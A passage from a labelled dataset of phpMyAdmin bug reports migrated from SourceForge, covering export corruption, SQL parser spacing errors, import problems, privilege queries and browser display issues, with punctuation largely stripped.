Perhaps queries longer than a certain number of characters shouldn t be parsed at all I am not sure what consequences this has).
Using the profiler I noticed that quite a lot of overhead is added by wrapper functions like PMA STR isAlnum.
With a few optimizations I managed to reduce the running time of PMA SQP parse ) with about 30 .
This doesn t really solve the problem, but it may be worth taking anyway.
Original URL https sourceforge.net p phpmyadmin bugs 2698 https sourceforge.net p phpmyadmin bugs 2698 Original author c960657 Found in version 2.11.6","bug"
"24444","9062","tabindex not set correctly.
When you open a table and edit a lot of datasets you can jump through input fields by pushing your tab key and change your values.
When you ve got a lot of fields this works only in the beginning.
After a few hundred?)
fields tab jumps from input field to some other place in the top, to the next input field and once again to the top and so on.
I think, the tabindex in html isn t counted right.
Firefox 2.0.0.14 phpMyAdmin 2.11.6 php 4.4.8 MySQL 5.0.45 Original URL https sourceforge.net p phpmyadmin bugs 2699 https sourceforge.net p phpmyadmin bugs 2699 Original author d mrowczynski Found in version 2.11.6","bug"
"24444","9063","no table pagination.
cfg[ MaxTableList ] = 12; if a db has more than 12 tables in pma 2.11.6 STABLE I get Page number [1] gt; gt; gt; missing in trunk rev.11294 though.
Original URL https sourceforge.net p phpmyadmin bugs 2700 https sourceforge.net p phpmyadmin bugs 2700 Original author windkiel Found in version Latest Git","bug"
"24444","9064","HTML in exports getting corrupted.
Summary If session cookies are not available for any reason, then an export of a database or table, containing HTML with anchors and forms, will get transparent session IDs inserted into it, effectvely corrupting the export.
Here are more details and a fix a copy of an e mail sent in earlier) I have found a fix for this problem, and will be posting it to the phpMyAdmin project as a bug.
It is a problem with all versions, so far as I can see, but the fix is simple and makes logical sense.
Basically, when running through Plesk, and perhaps because I am going in and out of phpMyAdmin under different accounts, something goes wrong with the sessions.
I am finding that my browser is sending different session cookies all called phpMyAdmin , and the phpmyadmin application is sending my browser multiple cookies.
Why that happens is by the by, but the end result is that trans sid session IDs are being added to the URLs in the page, because the cookies are not being picked up correctly this can also be replicated simply by setting the browser to refuse all cookies).
The settings within phpMyAdmin allow it to use these trans sids transparent sessions IDs) if necessary, but and this is the key thing) they do not get turned off when exporting a tables to a file.
It works fine when exporting to the web page, because the export is inserted into a form field, which in turn is in a fieldset, and trans sid is set to ignore html within fieldsets.
So to the solution.
This is the easy bit phpMyAdmin export.php line 332 add this ini set url rewriter.tags , ); This tells PHP to rewrite no tags in the output.
This only gets executed when the export goes to a file.
So far as I can see, this is a problem with every version of phpMyAdmin, including the very latest.
Basically, if session cookies are not working for any reason which my be because they are turned off in the browser, or may be because Plesk is messing then up) then an export of a database to a file will always have its HTML messed up by these trans sids.
I don t think Plesk can fix this it is entirely down to phpMyAdmin.
I have added that one line to my install in the VPS .
usr local psa admin htdocs domains databases phpMyAdmin export.php) and it works flawlessly.
I realise the change is likely to be overwritten on any upgrades, so I ll install my own version of phpMyAdmin somewhere else for a longer term fix.
So to replicate, turn off cookies in your browser, then export a database with tables containing HTML anchors and forms, to a file.
It must be exported to a file and not to the page.
The fix looks like this Send headers depending on whether the user chose to download a dump file or not if !
save on server) \{ if asfile ) \{ Download ini set url rewriter.tags , ); THE FIX if !empty content encoding)) \{ header Content Encoding .
content encoding); \} header Content Type .
mime type); header Expires .
gmdate D, d M Y H i s ) .
GMT ); Original URL https sourceforge.net p phpmyadmin bugs 2701 https sourceforge.net p phpmyadmin bugs 2701 Original author jasonjudge Found in version 2.11.6","bug"
"24444","9065","problem with comma and quote in enum.
Hello, there s 2 little issues with comma and quote put together 1) When having , comma and quote) in a enum s value, there s a problem to display correctly escaped character in tbl structure.php and libraries tbl properties.php Example Create a table with an enum field with length values good ol\ test , foo,\ bar .
We should have an enum field wich can be good ol test or foo, bar .
But in tbl structure.php and libraries tbl properties.php, it appears as enum good ol\ test , foo, bar ) Note that good ol test is well displayed, but the other have double simple quote escape type.
This issue seems not really annoying, displaying just a not really rigorous not same escape style in a string .
tbl change.php s enum s list aren t affected.
Error seems to be on librairies tbl properties.inc.php line 274 tbl struture.php line 260 2) When having , quote, comma and quote), there s a problem with the enum s list of tbl change.php where the value is split in 2 part before and after the , ).
Example Create a table with an enum field with length values good ol\ test , foo\ ,\ bar .
We have the same problem display problem then before, we can see enum good ol\ test , foo\ , bar ).
But the real issue is in the enum s list of tbl change.php good ol test , foo , bar .
Error seems to be on libraries common.lib.php function PMA getEnumSetOptions type def) line 1445 Bug seen on phpMyAdmin 2.11.6 Original URL https sourceforge.net p phpmyadmin bugs 2702 https sourceforge.net p phpmyadmin bugs 2702 Original author mclone","bug"
"24444","9066","Relationship view should check for change.
From the relationship view of a table both internal and InnoDB relationships are shown.
When clicking the Save button, InnoDB relationships are dropped and re created, even if no changes to them have been made.
This is not generally a problem, but for those of us who work with tables with lots of data run into problems.
The relationship view should double check to see if any changes have been made to the InnoDB relationships before starting to alter the tables.
Case in point One of my tables has 121,000 rows and is 850 Mb.
Trying to set the Choose field to display option ultimately resulted in one of my two InnoDB relationships being dropped completely and not recreated due to a timeout) and the Choose field to display not being saved.
Original URL https sourceforge.net p phpmyadmin bugs 2703 https sourceforge.net p phpmyadmin bugs 2703 Original author drsmitty06 Found in version 2.11.7","bug"
"24444","9067","Space before text in field name.
I haven t installed the latest build, but I am running 2.10.3 and if you have a space in front of the fieldname it doesn t reflect.
This leads to MAJOR frustration when you get an error that says the column doesn t exist.
I am upgrading but though that this should be brought to your attention.
Ryan Original URL https sourceforge.net p phpmyadmin bugs 2704 https sourceforge.net p phpmyadmin bugs 2704 Original author rcolemanapi Found in version 2.11.6","bug"
"24444","9068","Wrong result display [BINARY B].
Tested against svn revision 11303; MySQL client version 4.1.7; Used PHP extensions mysqli; MySQL server version 4.1.16; step by step create test table like this CREATE TABLE `Test` `number` INT 10 ) NULL , `stamp` DATE NULL ) ENGINE = MYISAM; INSERT INTO `Test` `number` , `stamp` ) VALUES 10001 , 2008 06 01 ), 10002 , 2008 06 02 ), 10003 , 2008 06 03 ); execute the following SQL SELECT substring number, 3, 3 ) , if stamp = 2008 06 01 , NULL , stamp ) FROM Test; = gt; Expected result the human readable format of the result values of the SUBSTRING ) and IF ) functions.
= gt; Actual result [BINARY 3B] for the values in `number` column; [BINARY 10B] for the second and third row values for the `stamp` column; Original URL https sourceforge.net p phpmyadmin bugs 2705 https sourceforge.net p phpmyadmin bugs 2705 Original author gtalev","bug"
"24444","9069","Profiling causes query to be executed again.
Whenever you preform a query, click on profiling, your query is preformed again.
Quite annoying when inserting data...
Original URL https sourceforge.net p phpmyadmin bugs 2706 https sourceforge.net p phpmyadmin bugs 2706 Original author kjarli Found in version 2.11.6","bug"
"24444","9070","export fails if one table is marked as crashed.
I have a table in the following condition MySQL said 144 Table .\xaangst dbo\credencial is marked as crashed and last automatic?)
repair failed I do not know how to reproduce a table crash this one was imported with MySQL migration tool from MS SQL MSDE 2000), but exporting the entire database seems to end successfully with no error messages at all.
But at the end of the dump file you can find the page as in, HTML code) that would display the error mentioned previously when trying to view the contents of the table lt;br gt; lt;b gt;Warning lt; b gt; Cannot modify header information headers already sent by output started at C \xampp\phpMyAdmin\export.php 190) in lt;b gt;C \xampp\phpMyAdmin\libraries\ob.lib.php lt; b gt; on line lt;b gt;83 lt; b gt; lt;br gt; [...] lt;code gt; 144 Table .\nahrin dbo\credencial is marked as crashed and last automatic?)
repair failed lt; code gt; ...etcetera A dump of all the normal tables with a warning for the ones that can t be imported would be nice.
Original URL https sourceforge.net p phpmyadmin bugs 2707 https sourceforge.net p phpmyadmin bugs 2707 Original author aaaa4rerdrd Found in version 2.11.4","bug"
"24444","9071","Delete multiple views.
After selecting a Database I get the overview of the tables and views in the database.
Then I check some of these checkboxes of the views to do sth.
with all selected.
After that I choose Drop in the select box.
phpMyAdmin is asking me if I want to drop these views DROP TABLE `view1`, `view2`; If I confim, I get an Unknown table error.
It tries to delete a talble with drop table instead of drop view .
Original URL https sourceforge.net p phpmyadmin bugs 2708 https sourceforge.net p phpmyadmin bugs 2708 Original author jacky php Found in version 2.11.6","bug"
"24444","9072","sql file import very slow on Windows.
Since 2.11.3 importing sql has been very slow and invariably times out.
A test file with only 27 queries takes 22 seconds to complete.
I have traced the issue to line 118 of libraries\import\sql.php p8 = stripos buffer, DELIMITER , i); Changing to stripos to strpos reduces the import time for my test file to a sensible 2 seconds.
The problem is occuring only on my Windows machine IIS 5.1 with php 5.26 CGI FastCGI) but is fine on my Linux server.
I realise that stripos is a new command in php5 but for some reason it is adding a massive overhead to this process.
Original URL https sourceforge.net p phpmyadmin bugs 2709 https sourceforge.net p phpmyadmin bugs 2709 Original author wotnot","bug"
"24444","9073","SQL Parser removes essential SPACE.
executing CREATE FUNCTION `ProperCase` cInput TEXT) RETURNS text NOT DETERMINISTIC CONTAINS SQL SQL SECURITY DEFINER COMMENT BEGIN Declare cReturn Text; Set cReturn = CONCAT UPPER LEFT cInput,1)),LOWER SUBSTRING cInput, 2))); RETURN cReturn; END; results in SQL error missing spave between DETERMINISTICCONTAINS CREATE FUNCTION `ProperCase` cInput TEXT ) RETURNS text NOT DETERMINISTICCONTAINS SQLSQL SECURITY DEFINER COMMENT BEGIN Declare cReturn Text; 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 8 Original URL https sourceforge.net p phpmyadmin bugs 2710 https sourceforge.net p phpmyadmin bugs 2710 Original author cybot tm","bug"
"24444","9074","federated access denied cause table list to be empty.
I have a database with 368 tables.
created 1 federated table.
ommit to specify the password so the access was denied to the table data.
phpmyadmin couldn t list any table in the database.
Only the number of tables 368) was shown on the left panel.
But when click on the database name, no tables were shown.
Fix should show all the other tables, an maybe add warning that table X info cannot be set.
Original URL https sourceforge.net p phpmyadmin bugs 2711 https sourceforge.net p phpmyadmin bugs 2711 Original author woodspire Found in version 2.11.6","bug"
"24444","9075","Firefox 3 and .sql.gz.
SQL exports gzipped) are corrupted under Firefox 3.
Original URL https sourceforge.net p phpmyadmin bugs 2712 https sourceforge.net p phpmyadmin bugs 2712 Original author lem9 Found in version 2.11.6","bug"
"24444","9076","Opera 9.50 displays wide data squeezed into window.
This is probably an Opera 9.50 feature bug, but as there are browserspecific CSS code in phpMyAdmin I shall mention it here.
When browsing a table with many fields the result is displayed as a table squeezed into the available window space instead of creating a horizontally scrollable display area.
The result is nearly unreadable with a lot of narrow columns displaying data vertically.
Original URL https sourceforge.net p phpmyadmin bugs 2713 https sourceforge.net p phpmyadmin bugs 2713 Original author joergent Found in version 2.11.7.1","bug"
"24444","9077","ARCHIVE cannot have indexes.
When using the archive database engine, no warning should be shown when no index are defined for a table.
Why ?
Because we can t create any index in this type of engine.
Original URL https sourceforge.net p phpmyadmin bugs 2714 https sourceforge.net p phpmyadmin bugs 2714 Original author woodspire","bug"
"24444","9078","SQL errors when sorting statistics 2.11.x).
When sorting Database Statistics the following pma generated) SQL error is reported begin paste SQL query Documentation SELECT `information schema`.`SCHEMATA`.
, COUNT `information schema`.`TABLES`.`TABLE SCHEMA`) AS `SCHEMA TABLES`, SUM `information schema`.`TABLES`.`TABLE ROWS`) AS `SCHEMA TABLE ROWS`, SUM `information schema`.`TABLES`.`DATA LENGTH`) AS `SCHEMA DATA LENGTH`, SUM `information schema`.`TABLES`.`MAX DATA LENGTH`) AS `SCHEMA MAX DATA LENGTH`, SUM `information schema`.`TABLES`.`INDEX LENGTH`) AS `SCHEMA INDEX LENGTH`, SUM `information schema`.`TABLES`.`DATA LENGTH` `information schema`.`TABLES`.`INDEX LENGTH`) AS `SCHEMA LENGTH`, SUM `information schema`.`TABLES`.`DATA FREE`) AS `SCHEMA DATA FREE` FROM `information schema`.`SCHEMATA` [...] MySQL said Documentation 1247 Reference SCHEMA DATA LENGTH not supported reference to group function) end paste To reproduce from main page Click Databases Enable Statistics if necessary Click Tables column header to sort by that column and this error is displayed.
Rows, Data, Indexes, Total, and Overhead also exhibit this behavior; Databases and Collation sort correctly with no error.
Initially reported on IRC by user orzel on 2.11.4, confirmed by me to still exist in 2.11.7 HOWEVER the 3.x dev SVN tree works correctly tested with rev 11349).
Original URL https sourceforge.net p phpmyadmin bugs 2715 https sourceforge.net p phpmyadmin bugs 2715 Original author ibennetch Found in version 2.11.7","bug"
"24444","9079","Saved queries greater 1000 chars not displayed.
If you save a sql query it is available in the saved sql queries drop down of the SQL tab.
Next to the drop down are three radio buttons, on eis to only display the selected query without running it e.g.
to only edit the query.
The bug If the saved SQL query is longer than 1000 chars, the query is not displayed.
Reproducing steps Navigate to a table in your DB and select the SQL tab.
Enter the SQL query SELECT count ) AS a FROM table enter test into the save sql text box under it and check both check boxes next to it.
Hit OK. Go again to the SQL tab Select the test entry from the drop down list in the button and select display only from the radio buttons.
Hit OK Now you see how it should work The SQL query is displayed again in the text area above.
Now change the sql query to make it longer than 1000 chars by simply appending about 1000 a s to the AS a clause.
Now redo all steps from above enter test in the text box under it, check both check boxes .... try to display the saved query again It now displays the standard query in the text area not the saved one.
Original URL https sourceforge.net p phpmyadmin bugs 2716 https sourceforge.net p phpmyadmin bugs 2716 Original author mswiege Found in version 2.11.7","bug"
"24444","9080","don t display delete icon if user isn t granted for DELETE.
A user w o grants of DELETE shouldn t see that icon to delete a table entry.
Original URL https sourceforge.net p phpmyadmin bugs 2717 https sourceforge.net p phpmyadmin bugs 2717 Original author toralf foerster Found in version 2.11.7","bug"
"24444","9081","IE6.
IE6 Having issues logging into PHPMYADMIN, screen just keeps refreshing when you try and login to a different server of your choice.
However, mozilla firefox 2.0 works with both server choices.
Mysql1 is using MYSQL 4.0 Mysql2 is using MYSQL 5.0 hope you guys can help.
Original URL https sourceforge.net p phpmyadmin bugs 2718 https sourceforge.net p phpmyadmin bugs 2718 Original author jamieminter Found in version 2.11.6","bug"
"24444","9082","Blob not sorted correctly.
Blobs are not sorted correctly.
Actually Kio, Mio, o Should be Mio, Kio, o Can someone correct this ?
Original URL https sourceforge.net p phpmyadmin bugs 2719 https sourceforge.net p phpmyadmin bugs 2719 Original author atkati Found in version 2.11.5","bug"
"24444","9083","Data loss on import resubmit.
If a file is to big to upload via the import page and thus times out the page allows users to resubmit the same file and continue the import where it left off.
There is a small bug in this process or at least there needs to be more documentation on the page).
If the user enters a value other than zro in the Number of records queries) to skip from start field then upon resubmission this value is still set and causes that many records to be skipped on the resubmit which is results in an inadvertent loss of data).
Suggested fix ignore the value in that field on the resubmit.
Original URL https sourceforge.net p phpmyadmin bugs 2720 https sourceforge.net p phpmyadmin bugs 2720 Original author stuchalk Found in version 2.11.7","bug"
"24444","9084","import csv.php import line 160.
By default the import uses empty for missing data; however, if the table structure calls for a default of NULL, the insert is not performed correctly.
Also, for a CSV import, why is a ; [semi colon] the default and not a comma [comma separated values] Original URL https sourceforge.net p phpmyadmin bugs 2721 https sourceforge.net p phpmyadmin bugs 2721 Original author mshaffer","bug"
"24444","9085","Safari exported files have wrong creation date.
The exported .gz file doesn t have the current creation modification date.
This only happens in with Safari I ve been told in the german help forum that this happens with Safari on windows too).
Exporting files with Firefox3.x results in files with correct =current) date.
I ve tried it with different client macs and different servers locally and online).
The date the files show is exactly the date of the pma files.
It only happens with phpMyAdmin downloading files from websites result in files having the current date and time.
Reproduce run Safari export a database into a .gz file check the files creation modification date Server Server version 5.0.45 Protocol version 10 Server iMac , Mac OS X 10.4.11, Apache 1.3 phpMyAdmin 2.11.7 MySQL client version 5.0.24a Used PHP extensions mysqli MySQL Zeichensatz UTF 8 Unicode utf8) Client Mac OS X 10.4.11, Browser Safari Version 3.1.2 4525.22) Original URL https sourceforge.net p phpmyadmin bugs 2722 https sourceforge.net p phpmyadmin bugs 2722 Original author hkrems","bug"
"24444","9086","Import export fails because of Mac files.
I downloaded PhpMyAdmin on a Mac and put up the files on my webserver.
After that, I got some problems with importing and exporting file.
This may happen in other pages as well, but so far I just know of this.
The first this was that some text appears in the import export site when I want to select what to export.
The text looks like this x05x16x07x02Mac OS X x02 2x0e?x02x0e?x01 ATTRH?U x0e?
?Jx01?Jx15com.apple.quarantine0000;48013329;Safari;95774F79 5506 4F3E BE79 F25DBC1166C0|com.apple.Safarix01x01 This resource fork intentionally left blank x01x01 ??
If I pressed Go to export a database to a file, I got a PHP error that a header has already been sent by .. libraries export .
csv.php .
I found out that the Mac OS creates a new file for each file in every folder starting with .
[filename] a hidden file in the UNIX system).
The file contained the text like in the export import page.
So it imported all the files in the xe2x80x9c..libraries export xe2x80x9d folder, and got a error because the text from the .
file was included first.
A possible solution would be that files starting with .
should not be included.
Original URL https sourceforge.net p phpmyadmin bugs 2723 https sourceforge.net p phpmyadmin bugs 2723 Original author tewee Found in version 2.11.7.1","bug"
"24444","9087","Import and missing last EOL.
stuchalk wrote Having tested this more I realize that the issue I am seeing is not due to the Number of records skipped, but to missing the last record in a file if there is not line terminating character at the end of the file.
It might be useful to indicate that on the import page... me Instead of indicate that, it would be more useful to handle this case.
Original URL https sourceforge.net p phpmyadmin bugs 2724 https sourceforge.net p phpmyadmin bugs 2724 Original author lem9","bug"
"24444","9088","quotes around lang missing.. Notice Use of undefined constant lang assumed lang in PMA\21108\libraries\common.inc.php on line 406 quotes around lang missing.
Original URL https sourceforge.net p phpmyadmin bugs 2725 https sourceforge.net p phpmyadmin bugs 2725 Original author windkiel Found in version 2.11.8","bug"
"24444","9089","missing space after BINARY used as cast.
Reproduce it this way open a database table hit the SQL button on the top bar enter a query like SELECT FROM `yourtable` WHERE binary 1 In the result, in the SQL query box you get SELECT FROM `yourtable` WHERE binary1 LIMIT 0 , 30 i.e.
a space is missing after binary Original URL https sourceforge.net p phpmyadmin bugs 2726 https sourceforge.net p phpmyadmin bugs 2726 Original author donpaolo Found in version 2.10.3","bug"
"24444","9090","incorrect number of found records keyword BINARY).
Reproduce it this way open a database table hit the SQL button on the top bar enter a query like SELECT FROM `yourtable` WHERE binary 1 In the result, you get all the record, but on the top you have Showing rows 0 0 1 total, Query took 0.0011 sec) i.e.
the number of found records is incorrect.
Note that this doesn t happen without the binary Original URL https sourceforge.net p phpmyadmin bugs 2727 https sourceforge.net p phpmyadmin bugs 2727 Original author donpaolo Found in version 2.10.3","bug"
"24444","9091","Links to version number on login screen.
2.11.8.1 removes the version number from the login screen but it can still be seen easily by clicking on either of the ?
icons to access help e.g.
the heading for one is phpMyAdmin 2.11.8.1 Documentation ).
Both of those ?
seem of marginal use, so a solution may be to remove them from the login screen and require a login for all the documentation.
Original URL https sourceforge.net p phpmyadmin bugs 2728 https sourceforge.net p phpmyadmin bugs 2728 Original author sparc64 Found in version 2.11.8","bug"
"24444","9092","pma doesn t start if ini set ) is disabled.
phpMyAdmin fails to start with a misleading error message due to a disabled ini set function on the server although sessions are working properly) Cannot start session without errors, please check errors given in your PHP and or webserver log file and configure your PHP installation properly.
Reasons are several ini set ...) calls in libraries session.inc.php throwing some Warning ini set ) has been disabled for security reasons in .... which are misinterpreted as errors induced by session start ) .
Replacing all ini set with ini set as already done in several other files) fixes the issue.
Original URL https sourceforge.net p phpmyadmin bugs 2729 https sourceforge.net p phpmyadmin bugs 2729 Original author windkiel Found in version 2.11.8","bug"
"24444","9093","Cannot import zip file.
Trying to import a zipfile fails with the message Error in ZIP archive Compressed size is not equal with the value in header information.
This message originates from the library unzip.lib.php which compares the strlen ) of the binary data from the zipfile with the compressed size field in the header.
I m not entirely sure where the problem lies, but I do know that my zipfile is valid.
Other tools unzip, zipinfo, Archive ZIP Perl)) do not complain.
My guess is that the calculation of the actual size is not correct.
Zipinfo tells me gertjan byte12 Desktop zipinfo 2vth test.zip Archive test.zip 601 bytes 1 file End of central directory record Actual offset of end of central dir record 579 00000243h) Expected offset of end of central dir record 579 00000243h) based on the length of the central directory and its expected offset) This zipfile constitutes the sole disk of a single part archive; its central directory contains 1 entry.
The central directory is 93 0000005Dh) bytes long, and its expected) offset in bytes from the beginning of the zipfile is 486 000001E6h).
There is no zipfile comment.
Central directory entry 1 db002260 henk 2008 07 31 08h19.sql offset of local header from start of archive 0 00000000h) bytes file system or operating system of origin Unix version of encoding software 2.3 minimum file system compatibility required MS DOS, OS 2 or NT FAT minimum software version required to extract 2.0 compression method deflated compression sub type deflation) normal file security status not encrypted extended local header no file last modified on DOS date time) 2008 Jul 31 08 19 04 file last modified on UT extra field modtime) 2008 Jul 31 08 19 04 local file last modified on UT extra field modtime) 2008 Jul 31 06 19 04 UTC 32 bit CRC value hex) 0ee52f7d compressed size 401 bytes uncompressed size 1224 bytes length of filename 34 characters length of extra field 13 bytes length of file comment 0 characters disk number on which file begins disk 1 apparent file type text Unix file attributes 100644 octal) rw r r MS DOS file attributes 00 hex) none The central directory extra field contains A subfield with ID 0x5455 universal time) and 5 data bytes.
The local extra field has UTC GMT modification access times.
A subfield with ID 0x7855 Unix UID GID) and 0 data bytes.
There is no file comment.
1 file, 1224 bytes uncompressed, 401 bytes compressed 67.2 The zipfile is created with zip on Linux.
I attached the zipfile to this report.
Additional question why not use the ZIp library from PHP http www.php.net manual en ref.zip.php)?
My guess is that that library is more robust, and more thoroughly tested than unzip.lib.php.
At least make this configurable in config.inc.php!
Original URL https sourceforge.net p phpmyadmin bugs 2730 https sourceforge.net p phpmyadmin bugs 2730 Original author gertjan ol","bug"
"24444","9094","Export DROP PROCEDURE needs IF EXISTS.
Hello.
If database exported with Add DROP TABLE VIEW PROCEDURE FUNCTION switch checked, then code generated in Procedures section is DROP PROCEDURE `myproc` CREATE DEFINER=`root` `localhost` PROCEDURE `myproc` ...) BEGIN ... END This causing a problem with importing this sql in databases where procedure myproc is not defined.
I think you should change DROP PROCEDURE `myproc` to DROP PROCEDURE IF EXISTS `myproc` .
As with tables and views.
Best regards, Anton.
Original URL https sourceforge.net p phpmyadmin bugs 2731 https sourceforge.net p phpmyadmin bugs 2731 Original author apollonx Found in version 2.11.8","bug"
"24444","9095","Export Type Replace does not work.
When exporting data from a table, export type Replace does not work.
It uses INSERT.
Does not work even if Data Export and Structure export is both checked or Data Export is the only one checked.
Does not work even if Save in file is checked or unchecked.
Does not work even if export as gzipped or plain text.
The export data type works before 2.11.7 after installing new version, no longer works.
Tested in both Windows and Linux.
Does work work for all data export on a table or base on sql queries with specific columns.
OS Versions In Windows PHP 5.2.5, MySQL 5.0.27 In Linux PHP 5.2.5, MySQL 4.1.22 Original URL https sourceforge.net p phpmyadmin bugs 2732 https sourceforge.net p phpmyadmin bugs 2732 Original author friend al 23 Found in version 2.11.8","bug"
"24444","9096","Font size entry not integrated in CSS file.
Hello, In both CSS Files theme left.css.php theme right.css.php, also at the DarkblueOrange Style) I miss font size lt;?php echo GLOBALS[ cfg ][ FontSize ]; ?
gt;; below the font family entry.
Is it possible to integrate this Line s in the Stylesheet?
If this line is not available the Font Size isn t adjustable and it looks terrible D xc2xb5atthias Original URL https sourceforge.net p phpmyadmin bugs 2733 https sourceforge.net p phpmyadmin bugs 2733 Original author counterroot Found in version 2.11.8","bug"
"24444","9097","framewidth not detected in opera and IE6.
in both opera 9.51 and IE6 OS win2000) COOKIE[ pma navi width ] stays at 200 after dragging the frame border.
works well only in geckos) Original URL https sourceforge.net p phpmyadmin bugs 2734 https sourceforge.net p phpmyadmin bugs 2734 Original author windkiel Found in version 2.11.8","bug"
"24444","9098","Export Error.
I was trying to export a query and everytime the file was exported with error.
It happens only in exports.
The phpmyadmin cut the end of the query.
I sent the image to try help understand what happens.
You can see that the end of the query is limit 5 on image.
When I click the Refresh , it show me the error saying Unknown column , but the phpmyadmin cutted the end.
The current version is phpMyAdmin 2.11.8.1 Original URL https sourceforge.net p phpmyadmin bugs 2735 https sourceforge.net p phpmyadmin bugs 2735 Original author lagden Found in version 2.11.8","bug"
"24444","9099","ok 2.11.9) Numbers in Excel export.
All data saved as number are formatted as text after Excel export.
Is there in place some kind of fix or is this issue already solved?
Original URL https sourceforge.net p phpmyadmin bugs 2736 https sourceforge.net p phpmyadmin bugs 2736 Original author cz patejl","bug"
"24444","9100","sql query quote filtering.
there are some unescaped quotes from sql query after inserting.
just look at attached screenshot.
i ve updated one of the field with a lot of php code.
and sorry for my english.
Original URL https sourceforge.net p phpmyadmin bugs 2737 https sourceforge.net p phpmyadmin bugs 2737 Original author maziasty Found in version 2.11.3","bug"
"24444","9101","Stored Routines not shown when no tables exists in schema.
When selecting a schema that has no table but contains some routines, nothing is shown.
In order to improve some usability when working with routines, might be helpful to have an additional tab in the upper side area or a switch in configuration file order to configure the way to see display them).
Original URL https sourceforge.net p phpmyadmin bugs 2738 https sourceforge.net p phpmyadmin bugs 2738 Original author danielpopiniuc Found in version 2.11.8","bug"
"24444","9102","Notices about deprecated dl ).
Trying to use the pre release of phpmyadmin 3.0.0 on a Mac results in the following unhelpful message Runtime Notice in .
libraries core.lib.php 406 dl ) is deprecated use extension=gd.so in your php.ini Unfortunately, on MacOS X, the Apple supplied version of php goes not have gd support, so modifying php.ini in this way will not work.
I urge you to strongly reconsider whatever you have done that cuases phpmyadmin 3.0.0 to require gd.
Doing so will prevent it being used on Macs by many users who do not have the resources to build their own php, or to go down the road of 3rd party php builds whose use is non tricial).
Original URL https sourceforge.net p phpmyadmin bugs 2739 https sourceforge.net p phpmyadmin bugs 2739 Original author ralphrmartin Found in version 3.0.0","bug"
"24444","9103","signon mode will not work if website is SSL enabled.
I am using signon to pass the user and password variables through the session in order to get automatically logged into phpMyAdmin from a small administration web app.
This worked fine when the website was using plain http.
Now I switched to https and this doesn t work anymore.
On the first trial I will get the SignonURL page but strangely if I try a second time it works.
I have tryed setting ForceSSL and also using PmaAbsoluteUri in the config file but it doesn t help.
My configuration is Apache 2.2 on Debian etch with PHP 5.2.
Let me know if you need more details, I would be pleased to provide you it.
Thank you in advance.
Original URL https sourceforge.net p phpmyadmin bugs 2740 https sourceforge.net p phpmyadmin bugs 2740 Original author randali Found in version 2.11.8","bug"
"24444","9104","Undefined offset notice.
After executing this two query SELECT id FROM products LIMIT 1 INTO a; SELECT a; I got the result I expected, but there is a PHP notice at the top Notice Undefined offset 0 in var www phpmyadmin libraries sqlparser.lib.php on line 1323 Notice Undefined offset 0 in var www phpmyadmin libraries sqlparser.lib.php on line 1324 Original URL https sourceforge.net p phpmyadmin bugs 2741 https sourceforge.net p phpmyadmin bugs 2741 Original author smacky86 Found in version 2.11.6","bug"
"24444","9105","Check tables having overhead selects wrongly.
When you click on Check tables having overhead , the script checks the boxes next to tables directly ABOVE those tables that actually have overhead.
Original URL https sourceforge.net p phpmyadmin bugs 2742 https sourceforge.net p phpmyadmin bugs 2742 Original author mark pmw Found in version 3.0.0","bug"
"24444","9106","Details link crashes Safari 4.0.
On any structure page, if I click the Details... link to show indexes etc, Safari crashes.
I m running the 4.0 review, so it could be a browser problem, but thought I should report it anyway.
Original URL https sourceforge.net p phpmyadmin bugs 2743 https sourceforge.net p phpmyadmin bugs 2743 Original author coolbru Found in version 3.0.0","bug"
"24444","9107","Silent truncation of input VARCHAR fields.
PhpMyAdmin allows user to enter text which is longer than corresponding VARCHAR field and silently stores the truncated field without any visible response to the user!
I find this really dangerous behaviour which doesn t fit such perfect application as phpmyadmin is.
There were other bugs which were related to this 1927233, 1667887), but it was always rejected.
Try to take it from the users point of view.
There must be some solution for this problem.
P.S.
I know there is problem when you use a function, but most of inserts are done without function.
Original URL https sourceforge.net p phpmyadmin bugs 2744 https sourceforge.net p phpmyadmin bugs 2744 Original author telensky Found in version 2.11.8","bug"
"24444","9108","Unknown column Event priv in field list .
Used MySQL 5.0.67 Click on DB name and go to Privileges page.
If MySQL server is pre 5.1.6 we have this error Unknown column Event priv in field list .
Solution server privileges.php line 1943. list of privileges = `User`, .
`Host`, .
`Select priv`, .
`Insert priv`, .
`Update priv`, .
`Delete priv`, .
`Create priv`, .
`Drop priv`, .
`Grant priv`, .
`Index priv`, .
`Alter priv`, .
`References priv`, .
`Create tmp table priv`, .
`Lock tables priv`, .
`Create view priv`, .
`Show view priv`, .
`Create routine priv`, .
`Alter routine priv`, .
`Execute priv` ; list of compared privileges = `Select priv` = \ N\ .
AND `Insert priv` = \ N\ .
AND `Update priv` = \ N\ .
AND `Delete priv` = \ N\ .
AND `Create priv` = \ N\ .
AND `Drop priv` = \ N\ .
AND `Grant priv` = \ N\ .
AND `References priv` = \ N\ .
AND `Create tmp table priv` = \ N\ .
AND `Lock tables priv` = \ N\ .
AND `Create view priv` = \ N\ .
AND `Show view priv` = \ N\ .
AND `Create routine priv` = \ N\ .
AND `Alter routine priv` = \ N\ .
AND `Execute priv` = \ N\ ; if PMA MYSQL INT VERSION gt;= 50106) \{ list of privileges .= , `Event priv`, .
`Trigger priv` ; list of compared privileges .= AND `Event priv` = \ N\ .
AND `Trigger priv` = \ N\ ; \} Original URL https sourceforge.net p phpmyadmin bugs 2745 https sourceforge.net p phpmyadmin bugs 2745 Original author hanut Found in version 3.0.0","bug"
"24444","9109","Missing question mark.
If i run pma with MySQL 4.1.22 the Browser send me to this path error.phplang=de dir=ltr type=Fehler error=Sie sollten auf MySQL 5.0.15 oder neuer umsteigen.
thils files doesn t exist.
Just add a ?
after error.php to fix this problem ) Original URL https sourceforge.net p phpmyadmin bugs 2746 https sourceforge.net p phpmyadmin bugs 2746 Original author schwaen Found in version 3.0.0","bug"
"24444","9110","Navi browse icon does not go to page 1.
Note sure if has been fixed couldn t find it), but when you are at a different page than page 1, you truncate the table, you are unable to switch back to page 1.
This can be fixed by querying yourself a simple select query, but should not be needed.
Original URL https sourceforge.net p phpmyadmin bugs 2747 https sourceforge.net p phpmyadmin bugs 2747 Original author kjarli Found in version 2.11.6","bug"
"24444","9111","Class ArrayObject not found.
Update my PMA 3.0.0 alpha to 3.0.0 beta and blank page after authenticate.
